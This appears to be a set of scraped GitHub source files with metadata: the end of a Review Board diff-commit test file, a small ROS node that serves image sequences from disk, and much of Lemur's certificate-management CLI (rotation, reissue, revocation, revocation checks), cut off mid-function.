        self.assertEqual(self.commits[1], base)
        self.assertEqual(self.commits[5], tip)
    def test_get_base_and_tip_commits_no_commits_diffset(self):
        """Testing get_base_and_tip_commits with a diffset and no commits"""
        # The commits must be fetched from the diffset: exactly one query.
        with self.assertNumQueries(1):
            base, tip = get_base_and_tip_commits(
                base_commit_id=1,
                tip_commit_id=5,
                diffset=self.diffset)
        self.assertEqual(self.commits[1], base)
        self.assertEqual(self.commits[5], tip)
    def test_get_base_and_tip_commits_with_commits_invalid_commit_id(self):
        """Testing get_base_and_tip_commits with commits and an invalid commit
        ID
        """
        base, tip = get_base_and_tip_commits(
            base_commit_id=7,
            tip_commit_id=5000,
            commits=[
                commit
                for commit in six.itervalues(self.commits)
            ])
        self.assertIsNone(base)
        self.assertIsNone(tip)
    def test_get_base_and_tip_commits_with_diffset_invalid_commit_id(self):
        """Testing get_base_and_tip_commits with a diffset and commit IDs
        belonging to a different diffset
        """
        # Commits from an unrelated diffset must not resolve against
        # self.diffset, even though their primary keys exist.
        other_diffset = self.create_diffset(repository=self.repository)
        other_commits = [
            self.create_diffcommit(diffset=other_diffset, **kwargs)
            for kwargs in (
                {'commit_id': 'r1', 'parent_id': 'r0'},
                {'commit_id': 'r2', 'parent_id': 'r1'},
            )
        ]
        base, tip = get_base_and_tip_commits(
            base_commit_id=other_commits[0].pk,
            tip_commit_id=other_commits[1].pk,
            diffset=self.diffset)
        self.assertIsNone(base)
        self.assertIsNone(tip)
    def test_get_base_and_tip_commits_only_base(self):
        """Testing get_base_and_tip_commits with only base_commit_id"""
        base, tip = get_base_and_tip_commits(
            base_commit_id=3,
            tip_commit_id=None,
            diffset=self.diffset)
        self.assertEqual(self.commits[3], base)
        self.assertIsNone(tip)
    def test_get_base_and_tip_commits_only_tip(self):
        """Testing get_base_and_tip_commits with only tip_commit_id"""
        base, tip = get_base_and_tip_commits(
            base_commit_id=None,
            tip_commit_id=3,
            diffset=self.diffset)
        self.assertIsNone(base)
        self.assertEqual(self.commits[3], tip)
|
{
"content_hash": "f318f3c38a134d2dbfc7da268869b9b8",
"timestamp": "",
"source": "github",
"line_count": 808,
"max_line_length": 78,
"avg_line_length": 34.40717821782178,
"alnum_prop": 0.5060969029891011,
"repo_name": "chipx86/reviewboard",
"id": "42c33567571b6f531d9a75618f5fe80c4759e84a",
"size": "27801",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "reviewboard/diffviewer/tests/test_commit_utils.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "434719"
},
{
"name": "HTML",
"bytes": "224310"
},
{
"name": "JavaScript",
"bytes": "3830753"
},
{
"name": "Python",
"bytes": "7333453"
},
{
"name": "Shell",
"bytes": "777"
}
],
"symlink_target": ""
}
|
import os
import cv2
import rospy
import actionlib
from cv_bridge import CvBridge
from camera_control_msgs.msg import GrabSequenceAction, GrabSequenceResult
__author__ = 'nikolas'
# Filled in by the __main__ block below with the running action server.
server = None
# Shared converter between OpenCV images and sensor_msgs/Image.
bridge = CvBridge()
def load_folder(folder):
    """Map exposure-time number -> file path for every image in *folder*.

    File names are expected to end in "_<number>.<ext>"; the number is
    parsed as the key.  Non-conforming names are logged and skipped.

    NOTE(review): this file uses Python 2 print statements throughout.
    """
    file_list = os.listdir(folder)
    print file_list
    file_map_ = dict()
    for f in file_list:
        try:
            s = int(f.split("_")[-1].split('.')[0])  # ???_number.??? -> number
        except ValueError as e:
            rospy.logerr("Invalid filename "+f+str(e))
            continue
        file_map_[s] = folder+"/"+f
    return file_map_
def select_images(file_map_, req_list):
    """Pick the closest available image for each requested exposure time.

    Returns a GrabSequenceResult whose exposureTimes/images lists are
    parallel to *req_list*.
    """
    # select each image seperately (could lead to double images in result)
    res = GrabSequenceResult()
    res.exposureTimes = []
    res.images = []  # sensor_msgs/Image, one per requested time
    for t in sorted(file_map_.keys()):
        print t,
    print
    for t in req_list:
        print t,
        # Nearest available exposure to the requested one.
        best_exp = min(file_map_.keys(), key=lambda x: abs(x-t))
        res.exposureTimes.append(best_exp)
        best_file = file_map_[best_exp]
        # create sensor_msgs/Image from files
        print best_file
        img = cv2.imread(best_file, 0)  # 0 -> load as grayscale
        as_sensor_msg = bridge.cv2_to_imgmsg(img, "mono8")
        res.images.append(as_sensor_msg)
    res.success = True
    return res
def grab_sequence_callback(goal):
folder = "/home/nikolas/Documents/sequence_test"
# folder = rospy.get_param("~data_folder")
if not os.path.isdir(folder):
rospy.logerr("'"+folder+"' is no directory")
res = GrabSequenceResult()
res.success = False
server.set_succeeded(res)
return
file_map = load_folder(folder)
print file_map
res = select_images(file_map, goal.desiredExposureTimes)
server.set_succeeded(res)
if __name__ == "__main__":
    # Stand-alone node: serves GrabSequence goals from image files on disk.
    rospy.init_node("image_file_sequencer")
    server = actionlib.SimpleActionServer("/image_file_sequencer", GrabSequenceAction,
                                          execute_cb=grab_sequence_callback, auto_start=False)
    server.start()
    rospy.spin()
|
{
"content_hash": "5fe5fabe2ab72004907be1168f88f179",
"timestamp": "",
"source": "github",
"line_count": 81,
"max_line_length": 94,
"avg_line_length": 25.728395061728396,
"alnum_prop": 0.6113243761996161,
"repo_name": "suzlab/Autoware",
"id": "3a7256925c6d7621766c2c0fd5a7d85fb5da4793",
"size": "2130",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "ros/src/sensing/drivers/camera/packages/pylon_camera/pylon_camera/scripts/file_sequencer.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "1500382"
},
{
"name": "C++",
"bytes": "7522176"
},
{
"name": "CMake",
"bytes": "292891"
},
{
"name": "CSS",
"bytes": "22550"
},
{
"name": "Cuda",
"bytes": "281867"
},
{
"name": "GDB",
"bytes": "23"
},
{
"name": "HTML",
"bytes": "42329"
},
{
"name": "Java",
"bytes": "539698"
},
{
"name": "JavaScript",
"bytes": "215453"
},
{
"name": "Makefile",
"bytes": "19653"
},
{
"name": "Matlab",
"bytes": "20217"
},
{
"name": "Prolog",
"bytes": "1723"
},
{
"name": "Python",
"bytes": "840645"
},
{
"name": "QMake",
"bytes": "12635"
},
{
"name": "Shell",
"bytes": "24900"
}
],
"symlink_target": ""
}
|
"""
.. module: lemur.certificate.cli
:platform: Unix
:copyright: (c) 2018 by Netflix Inc., see AUTHORS for more
:license: Apache, see LICENSE for more details.
.. moduleauthor:: Kevin Glisson <kglisson@netflix.com>
"""
import arrow
import sys
from flask import current_app
from flask_principal import Identity, identity_changed
from flask_script import Manager
from sqlalchemy import or_
from tabulate import tabulate
from time import sleep
from sentry_sdk import capture_exception
from lemur import database
from lemur.authorities.models import Authority
from lemur.authorities.service import get as authorities_get_by_id
from lemur.authorities.service import get_by_name as get_authority_by_name
from lemur.certificates.models import Certificate
from lemur.certificates.schemas import CertificateOutputSchema
from lemur.certificates.service import (
reissue_certificate,
get_certificate_primitives,
get_all_pending_reissue,
get_by_name,
get_all_valid_certs,
get,
get_all_certs_attached_to_endpoint_without_autorotate,
get_all_certs_attached_to_destination_without_autorotate,
revoke as revoke_certificate,
list_duplicate_certs_by_authority,
get_certificates_with_same_prefix_with_rotate_on,
identify_and_persist_expiring_deployed_certificates,
send_certificate_expiration_metrics
)
from lemur.certificates.verify import verify_string
from lemur.constants import SUCCESS_METRIC_STATUS, FAILURE_METRIC_STATUS, CRLReason
from lemur.deployment import service as deployment_service
from lemur.domains.models import Domain
from lemur.endpoints import service as endpoint_service
from lemur.extensions import metrics
from lemur.notifications.messaging import send_rotation_notification, send_reissue_no_endpoints_notification, \
send_reissue_failed_notification
from lemur.plugins.base import plugins
from sqlalchemy.orm.exc import MultipleResultsFound
# Flask-Script sub-manager; all certificate CLI commands below register onto it.
manager = Manager(usage="Handles all certificate related tasks.")
def print_certificate_details(details):
    """Pretty-print the primitives of a certificate about to be re-issued.

    :param details: certificate primitives, serialized through
        CertificateOutputSchema before display.
    :return: None
    """
    details, errors = CertificateOutputSchema().dump(details)
    san_values = ",".join(
        x["value"] for x in details["extensions"]["subAltNames"]["names"]
    ) or None
    print("[+] Re-issuing certificate with the following details: ")
    print(
        "\t[+] Common Name: {common_name}\n"
        "\t[+] Subject Alternate Names: {sans}\n"
        "\t[+] Authority: {authority_name}\n"
        "\t[+] Validity Start: {validity_start}\n"
        "\t[+] Validity End: {validity_end}\n".format(
            common_name=details["commonName"],
            sans=san_values,
            authority_name=details["authority"]["name"],
            validity_start=details["validityStart"],
            validity_end=details["validityEnd"],
        )
    )
def validate_certificate(certificate_name):
    """Resolve *certificate_name* to a certificate, exiting the CLI if missing.

    :param certificate_name: name to look up; falsy values yield None.
    :return: the certificate, or None when no name was given.
    """
    if not certificate_name:
        return None
    cert = get_by_name(certificate_name)
    if cert:
        return cert
    print("[-] No certificate found with name: {0}".format(certificate_name))
    sys.exit(1)
def validate_endpoint(endpoint_name):
    """Resolve *endpoint_name* to an endpoint, exiting the CLI if missing.

    :param endpoint_name: name to look up; falsy values yield None.
    :return: the endpoint, or None when no name was given.
    """
    if not endpoint_name:
        return None
    endpoint = endpoint_service.get_by_name(endpoint_name)
    if endpoint:
        return endpoint
    print("[-] No endpoint found with name: {0}".format(endpoint_name))
    sys.exit(1)
def validate_endpoint_from_source(endpoint_name, source):
    """Resolve an endpoint by name within a specific source, exiting if missing.

    :param endpoint_name: endpoint name to look up.
    :param source: source the endpoint must belong to.
    :return: the endpoint, or None unless both arguments are provided.
    """
    if not (endpoint_name and source):
        return None
    endpoint = endpoint_service.get_by_name_and_source(endpoint_name, source)
    if endpoint:
        return endpoint
    print("[-] No endpoint found from source {0} with name: {1}".format(source, endpoint_name))
    sys.exit(1)
def request_rotation(endpoint, certificate, message, commit):
    """Rotate *endpoint* onto *certificate*, reporting (not raising) failures.

    Nothing changes unless *commit* is truthy; a metric is emitted either way.
    When *message* is truthy a rotation notification is sent on success.

    :param endpoint: endpoint to rotate.
    :param certificate: certificate to rotate onto.
    :param message: whether to notify the certificate owner.
    :param commit: persist changes when truthy.
    :return: None
    """
    outcome = FAILURE_METRIC_STATUS
    if commit:
        try:
            deployment_service.rotate_certificate(endpoint, certificate)
            if message:
                send_rotation_notification(certificate)
        except Exception as e:
            capture_exception(extra={"certificate_name": str(certificate.name),
                                     "endpoint": str(endpoint.dnsname)})
            current_app.logger.exception(
                f"Error rotating certificate: {certificate.name}", exc_info=True
            )
            print(
                "[!] Failed to rotate endpoint {0} to certificate {1} reason: {2}".format(
                    endpoint.name, certificate.name, e
                )
            )
        else:
            outcome = SUCCESS_METRIC_STATUS
    metrics.send("endpoint_rotation", "counter", 1, metric_tags={"status": outcome,
                                                                 "certificate_name": str(certificate.name),
                                                                 "endpoint": str(endpoint.dnsname)})
def request_reissue(certificate, notify, commit):
    """Re-issue *certificate* with its original parameters, reporting failures.

    The reissue only happens when *commit* is truthy. Notifications require
    both *notify* and the certificate's own notify flag to be set.

    :param certificate: certificate to re-issue.
    :param notify: whether notifications are allowed at all.
    :param commit: persist changes when truthy.
    :return: None
    """
    outcome = FAILURE_METRIC_STATUS
    should_notify = notify and certificate.notify
    try:
        print("[+] {0} is eligible for re-issuance".format(certificate.name))
        # set the lemur identity for all cli commands
        identity_changed.send(current_app._get_current_object(), identity=Identity(1))
        print_certificate_details(get_certificate_primitives(certificate))
        if commit:
            new_cert = reissue_certificate(certificate, notify=should_notify, replace=True)
            print("[+] New certificate named: {0}".format(new_cert.name))
            if should_notify and isinstance(new_cert, Certificate):  # let celery handle PendingCertificates
                send_reissue_no_endpoints_notification(certificate, new_cert)
        outcome = SUCCESS_METRIC_STATUS
    except Exception as e:
        capture_exception(extra={"certificate_name": str(certificate.name)})
        current_app.logger.exception(
            f"Error reissuing certificate: {certificate.name}", exc_info=True
        )
        print(f"[!] Failed to reissue certificate: {certificate.name}. Reason: {e}")
        if should_notify:
            send_reissue_failed_notification(certificate)
    metrics.send(
        "certificate_reissue",
        "counter",
        1,
        metric_tags={"status": outcome, "certificate": certificate.name},
    )
@manager.option(
    "-e",
    "--endpoint",
    dest="endpoint_name",
    help="Name of the endpoint you wish to rotate.",
)
@manager.option(
    "-s",
    "--source",
    dest="source",
    help="Source of the endpoint you wish to rotate.",
)
@manager.option(
    "-n",
    "--new-certificate",
    dest="new_certificate_name",
    help="Name of the certificate you wish to rotate to.",
)
@manager.option(
    "-o",
    "--old-certificate",
    dest="old_certificate_name",
    help="Name of the certificate you wish to rotate.",
)
@manager.option(
    "-a",
    "--notify",
    dest="message",
    action="store_true",
    help="Send a rotation notification to the certificates owner.",
)
@manager.option(
    "-c",
    "--commit",
    dest="commit",
    action="store_true",
    default=False,
    help="Persist changes.",
)
def rotate(endpoint_name, source, new_certificate_name, old_certificate_name, message, commit):
    """
    Rotates an endpoint and reissues it if it has not already been replaced. If it has
    been replaced, will use the replacement certificate for the rotation.

    Three modes, chosen by which options are supplied:
      1. endpoint + new certificate: rotate that one endpoint;
      2. old + new certificate: rotate every endpoint of the old certificate;
      3. neither: rotate all endpoints that have a replacement certificate pending.

    :param endpoint_name: name of a single endpoint to rotate.
    :param source: source plugin of the endpoint (disambiguates duplicate names).
    :param new_certificate_name: certificate to rotate onto.
    :param old_certificate_name: certificate whose endpoints should be rotated.
    :param message: send a rotation notification to the certificate's owner.
    :param commit: persist changes; otherwise dry-run.
    """
    if commit:
        print("[!] Running in COMMIT mode.")
    print("[+] Starting endpoint rotation.")
    status = FAILURE_METRIC_STATUS
    log_data = {
        "function": f"{__name__}.{sys._getframe().f_code.co_name}",
    }
    try:
        old_cert = validate_certificate(old_certificate_name)
        new_cert = validate_certificate(new_certificate_name)
        if source:
            endpoint = validate_endpoint_from_source(endpoint_name, source)
        else:
            try:
                endpoint = validate_endpoint(endpoint_name)
            except MultipleResultsFound as e:
                print("[!] Multiple endpoints found with name {0}, try narrowing the search down to an endpoint from a specific source by re-running this command with the --source flag.".format(endpoint_name))
                log_data["message"] = "Multiple endpoints found with same name, unable to perform rotation"
                log_data["duplicated_endpoint_name"] = endpoint_name
                current_app.logger.info(log_data)
                raise
        # Mode 1: rotate a single named endpoint onto the new certificate.
        if endpoint and new_cert:
            print(
                f"[+] Rotating endpoint: {endpoint.name} to certificate {new_cert.name}"
            )
            log_data["message"] = "Rotating one endpoint"
            log_data["endpoint"] = endpoint.dnsname
            log_data["certificate"] = new_cert.name
            request_rotation(endpoint, new_cert, message, commit)
            current_app.logger.info(log_data)
        # Mode 2: rotate every endpoint currently attached to the old certificate.
        elif old_cert and new_cert:
            print(f"[+] Rotating all endpoints from {old_cert.name} to {new_cert.name}")
            log_data["certificate"] = new_cert.name
            log_data["certificate_old"] = old_cert.name
            log_data["message"] = "Rotating endpoint from old to new cert"
            for endpoint in old_cert.endpoints:
                print(f"[+] Rotating {endpoint.name}")
                log_data["endpoint"] = endpoint.dnsname
                request_rotation(endpoint, new_cert, message, commit)
                current_app.logger.info(log_data)
        else:
            # No certificate name or endpoint is provided. We will now fetch all endpoints,
            # which are associated with a certificate that has been replaced
            print("[+] Rotating all endpoints that have new certificates available")
            for endpoint in endpoint_service.get_all_pending_rotation():
                log_data["message"] = "Rotating endpoint from old to new cert"
                if len(endpoint.certificate.replaced) > 1:
                    log_data["message"] = f"Multiple replacement certificates found, going with the first one out of " \
                                          f"{len(endpoint.certificate.replaced)}"
                log_data["endpoint"] = endpoint.dnsname
                log_data["certificate"] = endpoint.certificate.replaced[0].name
                print(
                    f"[+] Rotating {endpoint.name} to {endpoint.certificate.replaced[0].name}"
                )
                request_rotation(endpoint, endpoint.certificate.replaced[0], message, commit)
                current_app.logger.info(log_data)
        status = SUCCESS_METRIC_STATUS
        print("[+] Done!")
    except Exception as e:
        # Errors are captured to Sentry but not re-raised; the metric below
        # reports failure via `status` remaining FAILURE_METRIC_STATUS.
        capture_exception(
            extra={
                "old_certificate_name": str(old_certificate_name),
                "new_certificate_name": str(new_certificate_name),
                "endpoint_name": str(endpoint_name),
                "message": str(message),
            }
        )
    metrics.send(
        "endpoint_rotation_job",
        "counter",
        1,
        metric_tags={
            "status": status,
            "old_certificate_name": str(old_certificate_name),
            "new_certificate_name": str(new_certificate_name),
            "endpoint_name": str(endpoint_name),
            "message": str(message),
            # NOTE(review): reads module globals(), not the local `endpoint`;
            # this likely always yields None — confirm intent.
            "endpoint": str(globals().get("endpoint")),
        },
    )
def request_rotation_region(endpoint, new_cert, message, commit, log_data, region):
    """Rotate *endpoint* onto *new_cert* only when its dnsname contains *region*.

    Mismatching endpoints are logged and skipped. *log_data* is mutated with
    the outcome message in both cases.
    """
    if region not in endpoint.dnsname:
        log_data["message"] = "Skipping rotation, region mismatch"
        print(log_data)
        current_app.logger.info(log_data)
        return
    log_data["message"] = "Rotating endpoint in region"
    request_rotation(endpoint, new_cert, message, commit)
    current_app.logger.info(log_data)
@manager.option(
    "-e",
    "--endpoint",
    dest="endpoint_name",
    help="Name of the endpoint you wish to rotate.",
)
@manager.option(
    "-n",
    "--new-certificate",
    dest="new_certificate_name",
    help="Name of the certificate you wish to rotate to.",
)
@manager.option(
    "-o",
    "--old-certificate",
    dest="old_certificate_name",
    help="Name of the certificate you wish to rotate.",
)
@manager.option(
    "-a",
    "--notify",
    dest="message",
    action="store_true",
    help="Send a rotation notification to the certificates owner.",
)
@manager.option(
    "-c",
    "--commit",
    dest="commit",
    action="store_true",
    default=False,
    help="Persist changes.",
)
@manager.option(
    "-r",
    "--region",
    dest="region",
    required=True,
    help="Region in which to rotate the endpoint.",
)
def rotate_region(endpoint_name, new_certificate_name, old_certificate_name, message, commit, region):
    """
    Rotates an endpoint in a defined region it if it has not already been replaced. If it has
    been replaced, will use the replacement certificate for the rotation.

    :param old_certificate_name: Name of the certificate you wish to rotate.
    :param new_certificate_name: Name of the certificate you wish to rotate to.
    :param endpoint_name: Name of the endpoint you wish to rotate.
    :param message: Send a rotation notification to the certificates owner.
    :param commit: Persist changes.
    :param region: Region in which to rotate the endpoint.
    #todo: merge this method with rotate()
    """
    if commit:
        print("[!] Running in COMMIT mode.")
    print("[+] Starting endpoint rotation.")
    status = FAILURE_METRIC_STATUS
    log_data = {
        "function": f"{__name__}.{sys._getframe().f_code.co_name}",
        "region": region,
    }
    try:
        old_cert = validate_certificate(old_certificate_name)
        new_cert = validate_certificate(new_certificate_name)
        endpoint = validate_endpoint(endpoint_name)
        # Mode 1: rotate a single named endpoint (region-filtered).
        if endpoint and new_cert:
            log_data["endpoint"] = endpoint.dnsname
            log_data["certificate"] = new_cert.name
            request_rotation_region(endpoint, new_cert, message, commit, log_data, region)
        # Mode 2: rotate every endpoint of the old certificate (region-filtered).
        elif old_cert and new_cert:
            log_data["certificate"] = new_cert.name
            log_data["certificate_old"] = old_cert.name
            log_data["message"] = "Rotating endpoint from old to new cert"
            print(log_data)
            current_app.logger.info(log_data)
            for endpoint in old_cert.endpoints:
                log_data["endpoint"] = endpoint.dnsname
                request_rotation_region(endpoint, new_cert, message, commit, log_data, region)
        # Mode 3: rotate everything pending rotation whose dnsname matches the region.
        else:
            log_data["message"] = "Rotating all endpoints that have new certificates available"
            print(log_data)
            current_app.logger.info(log_data)
            all_pending_rotation_endpoints = endpoint_service.get_all_pending_rotation()
            for endpoint in all_pending_rotation_endpoints:
                log_data["endpoint"] = endpoint.dnsname
                if region not in endpoint.dnsname:
                    log_data["message"] = "Skipping rotation, region mismatch"
                    print(log_data)
                    current_app.logger.info(log_data)
                    metrics.send(
                        "endpoint_rotation_region_skipped",
                        "counter",
                        1,
                        metric_tags={
                            "region": region,
                            "new_certificate_name": str(endpoint.certificate.replaced[0].name),
                            "endpoint_name": str(endpoint.dnsname),
                        },
                    )
                    continue
                log_data["certificate"] = endpoint.certificate.replaced[0].name
                log_data["message"] = "Rotating all endpoints in region"
                if len(endpoint.certificate.replaced) > 1:
                    log_data["message"] = f"Multiple replacement certificates found, going with the first one out of " \
                                          f"{len(endpoint.certificate.replaced)}"
                request_rotation(endpoint, endpoint.certificate.replaced[0], message, commit)
                current_app.logger.info(log_data)
                metrics.send(
                    "endpoint_rotation_region",
                    "counter",
                    1,
                    metric_tags={
                        # NOTE(review): this tag is hard-coded to the failure
                        # status even after a rotation attempt — confirm whether
                        # the real outcome was intended here.
                        "status": FAILURE_METRIC_STATUS,
                        "new_certificate_name": str(log_data["certificate"]),
                        "endpoint_name": str(endpoint.dnsname),
                        "message": str(message),
                        "region": str(region),
                    },
                )
        status = SUCCESS_METRIC_STATUS
        print("[+] Done!")
    except Exception as e:
        # Captured to Sentry but not re-raised; the job metric below carries
        # the failure status instead.
        capture_exception(
            extra={
                "old_certificate_name": str(old_certificate_name),
                "new_certificate_name": str(new_certificate_name),
                "endpoint": str(endpoint_name),
                "message": str(message),
                "region": str(region),
            }
        )
    metrics.send(
        "endpoint_rotation_region_job",
        "counter",
        1,
        metric_tags={
            "status": status,
            "old_certificate_name": str(old_certificate_name),
            "new_certificate_name": str(new_certificate_name),
            "endpoint_name": str(endpoint_name),
            "message": str(message),
            # NOTE(review): reads module globals(), not the loop variable;
            # likely always None — confirm intent.
            "endpoint": str(globals().get("endpoint")),
            "region": str(region),
        },
    )
@manager.option(
    "-o",
    "--old-certificate",
    dest="old_certificate_name",
    help="Name of the certificate you wish to reissue.",
)
@manager.option(
    "-a",
    "--notify",
    dest="notify",
    action="store_true",
    help="Send a re-issue failed notification to the certificates owner (if re-issuance fails).",
)
@manager.option(
    "-c",
    "--commit",
    dest="commit",
    action="store_true",
    default=False,
    help="Persist changes.",
)
def reissue(old_certificate_name, notify, commit):
    """
    Reissues certificate with the same parameters as it was originally issued with.
    If not time period is provided, reissues certificate as valid from today to
    today + length of original.

    When no certificate name is given, every certificate flagged as pending
    reissue is processed instead.
    """
    if commit:
        print("[!] Running in COMMIT mode.")
    print("[+] Starting certificate re-issuance.")
    outcome = FAILURE_METRIC_STATUS
    try:
        target = validate_certificate(old_certificate_name)
        if target:
            request_reissue(target, notify, commit)
        else:
            for candidate in get_all_pending_reissue():
                request_reissue(candidate, notify, commit)
        outcome = SUCCESS_METRIC_STATUS
        print("[+] Done!")
    except Exception as e:
        capture_exception()
        current_app.logger.exception("Error reissuing certificate.", exc_info=True)
        print("[!] Failed to reissue certificates. Reason: {}".format(e))
    metrics.send(
        "certificate_reissue_job", "counter", 1, metric_tags={"status": outcome}
    )
@manager.option(
    "-f",
    "--fqdns",
    dest="fqdns",
    help="FQDNs to query. Multiple fqdns specified via comma.",
)
@manager.option("-i", "--issuer", dest="issuer", help="Issuer to query for.")
@manager.option("-o", "--owner", dest="owner", help="Owner to query for.")
@manager.option(
    "-e",
    "--expired",
    dest="expired",
    type=bool,
    default=False,
    help="Include expired certificates.",
)
def query(fqdns, issuer, owner, expired):
    """Prints certificates that match the query params."""
    q = database.session_query(Certificate)
    if issuer:
        # Match either the free-text issuer field or an authority whose name matches.
        authority_ids = (
            database.session_query(Authority.id)
            .filter(Authority.name.ilike("%{0}%".format(issuer)))
            .subquery()
        )
        q = q.filter(
            or_(
                Certificate.issuer.ilike("%{0}%".format(issuer)),
                Certificate.authority_id.in_(authority_ids),
            )
        )
    if owner:
        q = q.filter(Certificate.owner.ilike("%{0}%".format(owner)))
    if not expired:
        q = q.filter(Certificate.expired == False)  # noqa
    if fqdns:
        # Each comma-separated fqdn narrows the result (AND semantics).
        for fqdn in fqdns.split(","):
            q = q.filter(
                or_(
                    Certificate.cn.ilike("%{0}%".format(fqdn)),
                    Certificate.domains.any(Domain.name.ilike("%{0}%".format(fqdn))),
                )
            )
    rows = [[c.id, c.name, c.owner, c.issuer] for c in q.all()]
    print(tabulate(rows, headers=["Id", "Name", "Owner", "Issuer"], tablefmt="csv"))
def worker(data, commit, reason):
    """Revoke the certificate whose id is the first token of *data*.

    Revocation only happens when *commit* is truthy. Both outcomes are
    reported via metrics; failures are printed rather than raised.
    """
    tokens = [piece for piece in data.split(" ") if piece]
    try:
        cert = get(int(tokens[0].strip()))
        print("[+] Revoking certificate. Id: {0} Name: {1}".format(cert.id, cert.name))
        if commit:
            revoke_certificate(cert, reason)
        metrics.send(
            "certificate_revoke",
            "counter",
            1,
            metric_tags={"status": SUCCESS_METRIC_STATUS},
        )
    except Exception as e:
        capture_exception()
        metrics.send(
            "certificate_revoke",
            "counter",
            1,
            metric_tags={"status": FAILURE_METRIC_STATUS},
        )
        print("[!] Failed to revoke certificates. Reason: {}".format(e))
@manager.command
def clear_pending():
    """Clear all pending certificates via the Verisign issuer plugin."""
    verisign = plugins.get("verisign-issuer")
    verisign.clear_pending_certificates()
@manager.option("-p", "--path", dest="path", help="Absolute file path to a Lemur query csv.")
@manager.option("-id", "--certid", dest="cert_id", help="ID of the certificate to be revoked")
@manager.option("-r", "--reason", dest="reason", default="unspecified", help="CRL Reason as per RFC 5280 section 5.3.1")
@manager.option("-m", "--message", dest="message", help="Message explaining reason for revocation")
@manager.option(
"-c",
"--commit",
dest="commit",
action="store_true",
default=False,
help="Persist changes.",
)
def revoke(path, cert_id, reason, message, commit):
"""
Revokes given certificate.
"""
if not path and not cert_id:
print("[!] No input certificates mentioned to revoke")
return
if path and cert_id:
print("[!] Please mention single certificate id (-id) or input file (-p)")
return
if commit:
print("[!] Running in COMMIT mode.")
print("[+] Starting certificate revocation.")
if reason not in CRLReason.__members__:
reason = CRLReason.unspecified.name
comments = {"comments": message, "crl_reason": reason}
if cert_id:
worker(cert_id, commit, comments)
else:
with open(path, "r") as f:
for x in f.readlines()[2:]:
worker(x, commit, comments)
@manager.command
def check_revoked():
    """
    Update Lemur's internal cache of certificate revocation status.

    This is called periodically by Lemur. It pages through all valid
    certificates from the supported revocation authorities and checks both
    CRLs and OCSP to see if a certificate is revoked. If verification cannot
    be completed the certificate status is marked `unknown`.
    """
    log_data = {
        "function": f"{__name__}.{sys._getframe().f_code.co_name}",
        "message": "Checking for revoked Certificates"
    }
    there_are_still_certs = True
    page = 1
    count = 1000
    # Running totals of OCSP/CRL verification errors across all pages.
    ocsp_err_count = 0
    crl_err_count = 0
    while there_are_still_certs:
        # get all valid certs issued until day before. This is to avoid OCSP not knowing about a newly created cert.
        certs = get_all_valid_certs(current_app.config.get("SUPPORTED_REVOCATION_AUTHORITY_PLUGINS", []),
                                    paginate=True, page=page, count=count,
                                    created_on_or_before=arrow.now().shift(days=-1))
        if len(certs) < count:
            # a short page means this must be the last page
            there_are_still_certs = False
        else:
            metrics.send(
                "certificate_revoked_progress",
                "counter",
                1,
                metric_tags={"page": page}
            )
            page += 1
        for cert in certs:
            try:
                if cert.chain:
                    status, ocsp_err, crl_err = verify_string(cert.body, cert.chain)
                else:
                    status, ocsp_err, crl_err = verify_string(cert.body, "")
                ocsp_err_count += ocsp_err
                crl_err_count += crl_err
                # None means verification was inconclusive.
                if status is None:
                    cert.status = "unknown"
                else:
                    cert.status = "valid" if status else "revoked"
                if cert.status == "revoked":
                    log_data["valid"] = cert.status
                    log_data["certificate_name"] = cert.name
                    log_data["certificate_id"] = cert.id
                    metrics.send(
                        "certificate_revoked",
                        "counter",
                        1,
                        metric_tags={"status": log_data["valid"],
                                     "certificate_name": log_data["certificate_name"],
                                     "certificate_id": log_data["certificate_id"]},
                    )
                    current_app.logger.info(log_data)
            except Exception as e:
                # Verification errors must not abort the sweep; mark and move on.
                capture_exception()
                current_app.logger.warning(e)
                cert.status = "unknown"
            try:
                database.update(cert)
            except Exception as e:
                capture_exception()
                current_app.logger.warning(e)
    metrics.send(
        "certificate_revoked_ocsp_error",
        "gauge",
        ocsp_err_count,
    )
    metrics.send(
        "certificate_revoked_crl_error",
        "gauge",
        crl_err_count,
    )
    # Total number of certificates examined across all pages.
    metrics.send(
        "certificate_revoked_checked",
        "gauge",
        (page - 1) * count + len(certs),
    )
@manager.command
def automatically_enable_autorotate_with_endpoint():
    """
    Enable auto-rotation on every unexpired certificate that is attached to an
    endpoint, was issued by a permitted authority, and does not already have
    autorotate enabled.
    WARNING: This will overwrite the Auto-rotate toggle!
    """
    log_data = {
        "function": f"{__name__}.{sys._getframe().f_code.co_name}",
        "message": "Enabling auto-rotate for certificate"
    }
    permitted_authorities = current_app.config.get("ENABLE_AUTO_ROTATE_AUTHORITY", [])
    for cert in get_all_certs_attached_to_endpoint_without_autorotate():
        if cert.authority_id not in permitted_authorities:
            continue
        if cert.destinations:
            destination_names = ', '.join(d.label for d in cert.destinations)
        else:
            destination_names = "NONE"
        log_data["certificate"] = cert.name
        log_data["certificate_id"] = cert.id
        log_data["authority_id"] = cert.authority_id
        log_data["authority_name"] = authorities_get_by_id(cert.authority_id).name
        log_data["destination_names"] = destination_names
        current_app.logger.info(log_data)
        metrics.send("automatically_enable_autorotate_with_endpoint",
                     "counter", 1,
                     metric_tags={"certificate": log_data["certificate"],
                                  "certificate_id": log_data["certificate_id"],
                                  "authority_id": log_data["authority_id"],
                                  "authority_name": log_data["authority_name"],
                                  "destination_names": log_data["destination_names"]
                                  })
        cert.rotation = True
        database.update(cert)
@manager.command
def automatically_enable_autorotate_with_destination():
    """
    Enable auto-rotation on every unexpired certificate that is attached to a
    destination (of the configured plugin type), was issued by a permitted
    authority, and does not already have autorotate enabled.
    WARNING: This will overwrite the Auto-rotate toggle!
    """
    log_data = {
        "function": f"{__name__}.{sys._getframe().f_code.co_name}",
        "message": "Enabling auto-rotate for certificate"
    }
    permitted_authorities = current_app.config.get("ENABLE_AUTO_ROTATE_AUTHORITY", [])
    destination_plugin_name = current_app.config.get("ENABLE_AUTO_ROTATE_DESTINATION_TYPE", None)
    for cert in get_all_certs_attached_to_destination_without_autorotate(plugin_name=destination_plugin_name):
        if cert.authority_id not in permitted_authorities:
            continue
        if cert.destinations:
            destination_names = ', '.join(d.label for d in cert.destinations)
        else:
            destination_names = "NONE"
        log_data["certificate"] = cert.name
